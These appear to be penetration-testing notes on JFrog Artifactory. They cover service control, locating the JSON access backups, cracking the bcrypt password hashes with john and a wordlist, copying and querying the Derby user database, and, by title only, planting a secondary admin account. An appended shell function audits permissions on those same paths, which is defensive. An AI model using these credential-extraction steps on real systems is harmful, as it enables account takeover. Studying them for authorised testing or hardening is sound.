Artifactory

Binary repository manager

Start / stop

sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start
sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop

Enum

ps aux | grep artifactory
ls -al /opt/jfrog/artifactory/var/data/artifactory/filestore/37

Binaries in the filestore are stored under their file hash, not their name.

Backups

The open-source version of Artifactory creates database backups of the user accounts at /ARTIFACTORY FOLDER/var/backup/access in JSON format. These files contain a full entry for each user, including the password hashed with bcrypt.

These hashes can be cracked with a wordlist:

sudo john derbyhash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Or copy the Derby database and open it:

mkdir /tmp/hackeddb
sudo cp -r /opt/jfrog/artifactory/var/data/access/derby /tmp/hackeddb
sudo chmod 755 /tmp/hackeddb/derby
sudo rm /tmp/hackeddb/derby/*.lck
sudo /opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij
connect 'jdbc:derby:/tmp/hackeddb/derby';
select * from access_users;

(this again gives access to the bcrypt-hashed passwords)

Adding a Secondary Artifactory Admin Account

This method requires write access to /opt/jfrog/artifactory/var/etc/access
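
As an added example (not part of the original notes or of JFrog's tooling), this shell function audits file modes on the three locations the notes above depend on: the access backups, the Derby store, and the etc/access configuration directory. The default root is the install path used on this page; the finding labels are made up for the example.

```sh
#!/bin/sh
# Added example: permission audit of the Artifactory paths discussed above.
# Usage: audit_artifactory_perms [ARTIFACTORY_ROOT]
# Prints one line per finding; returns 0 when clean, 1 when anything is found.
audit_artifactory_perms() {
    root="${1:-/opt/jfrog/artifactory}"

    report=$(
        # Files that hold bcrypt hashes: the JSON access backups and the
        # Derby database. Flag any file with the other-read bit (0004).
        for dir in var/backup/access var/data/access/derby; do
            [ -d "$root/$dir" ] || continue
            find "$root/$dir" -type f -perm -004 2>/dev/null |
                sed 's/^/READABLE_BY_OTHERS /'
        done

        # Configuration directory: group-write (0020) or other-write (0002)
        # on it, or on anything inside it, lets a non-owner change account
        # configuration.
        if [ -d "$root/var/etc/access" ]; then
            find "$root/var/etc/access" \( -perm -020 -o -perm -002 \) 2>/dev/null |
                sed 's/^/WRITABLE_BY_NON_OWNER /'
        fi
    )

    [ -z "$report" ] && return 0
    printf '%s\n' "$report"
    return 1
}

# Example call on a default install:
#   audit_artifactory_perms /opt/jfrog/artifactory
```

The check looks only at mode bits, so it does not account for ACLs or for sudo rules that grant access to these paths.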
